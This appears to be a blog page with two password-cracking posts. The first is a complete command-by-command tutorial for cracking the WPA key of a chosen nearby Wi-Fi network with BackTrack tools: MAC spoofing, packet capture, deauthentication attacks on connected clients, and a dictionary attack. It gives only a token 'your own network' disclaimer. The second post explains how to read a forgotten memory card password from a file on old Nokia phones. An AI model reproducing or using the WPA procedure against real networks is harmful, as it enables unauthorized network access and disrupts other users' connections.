Recent Posts

Showing posts with label Password Cracking. Show all posts
Showing posts with label Password Cracking. Show all posts

Thursday, December 19, 2013

Cracking Wireless (WPA)


 


This chapter will teach you how to crack the WPA of a wireless network using BackTrack 4 step by step. BackTrack is a free OS available for download at http://www.backtrack-linux.org/downloads/. This tutorial is using BackTrack 4, but it should work similar in newer versions. Backtrack is the ultimate security testing OS, and is preloaded with hundreds of tools you can use to hack. We're only going to be using a couple for this tutorial. Cracking WPA isn't 100% going to work everytime. It depends on how easy their WPA password is, and how good your dictionary file is.
What you will need:
  1. Download the BackTrack 4 flavor of your choice. You can either boot the OS using VMware within windows, or you can boot backtrack straight off of a DVD or flash drive. Instructions for each of these methods are on the backtrack website.
  2. Once you have booted up backtrack, it will ask you for a username and password. username: root password: toor
  3. Now type startx and press enter. This will log you into backtrack and you should now see the desktop.
  4. Open a command terminal. You can do this by clicking the black box icon bottom left corner of the screen.
  5. type in: airmon-ng
  6. Look for the name of your wireless card, its different for a lot of computers, mine is wlan0, so for the rest of this guide thats what i'm going to use. Replace wlan0 in all the following steps with whatever your device name is.
  7. type: airmon-ng stop wlan0
  8. type: macchanger --mac 00:11:22:33:44:55 wlan0
  9. type: airmon-ng start wlan0
  10. type: airodump-ng wlan0
  11. You will now see all of the wifi networks in range. once you found the one you want to hack, press Ctrl + C to stop scanning. Take note of the bssid and channel of the network you want to hack.
  12. type: airodump-ng -c (put the channel # here) -w wpahack --bssid (enter bssid here) wlan0
  13. Keep that window open, now open another command terminal and enter the following in the newly opened terminal:
  14. type: aireplay-ng -0 5 -a (enter bssid here) wlan0
  15. type: aircrack-ng wpahack.cap -w (path to a dictionary file)
  16. You should now see it attempting to crack the WPA key. This could take awhile depending on how big the dictionary file is, and how fast your computer is. When its found the key, it will appear on the screen. You can now log into that network using the WPA on the screen :)
NOTES:
This won't work if you dont get a WPA handshake. The command terminal will let you know if you've received the WPA handshake or not.
Hacking WPA isn't 100% going to work every time. It will only work if their WPA password is in the dictionary file you're using. The bigger the dictionary file, the better your chances, the longer it will take.
It is illegal to steal wireless internet. Only try this on your own network. This guide is for educational purposes only, as with everything in this ebook. Use at your own risk.

Monday, August 20, 2012

How to: Unlock Memory Card Passwords

How to: Unlock Memory Card Password


If one day suddenly you restore your phone , after that you find that your memory card is password protected and shit ! You don’t know the password and have some important files & data in that, what will you do ? Don’t worry, I will show you the way by which you can unlock memory card’s password. If that trick will not work then sorry you can’t recover your memory card’s password & data but yes , I will tell you the other trick by which you can format your memory card and at-least recover your memory card to reuse.
So, these are some tricks to recover your memory card’s password.

If you have a Nokia s60 1st & 2nd edition phone you can find your memory card’s forgotten password by following these steps:

  1. First of all Download  and Install FExplorer.
  2. Run FExplorer and Open the path C:\system.
  3. You will  find there a file named mmcstore , move this file to other location of your phone, rename the file mmcstore.txt
  4. Open the file in your phone or Copy that file(mmcstore.txt) to your pc and open that file in notepad.
  5. You will find your password in that file.
  6. By this way, you can unlock memory card and recover your memory card’s password.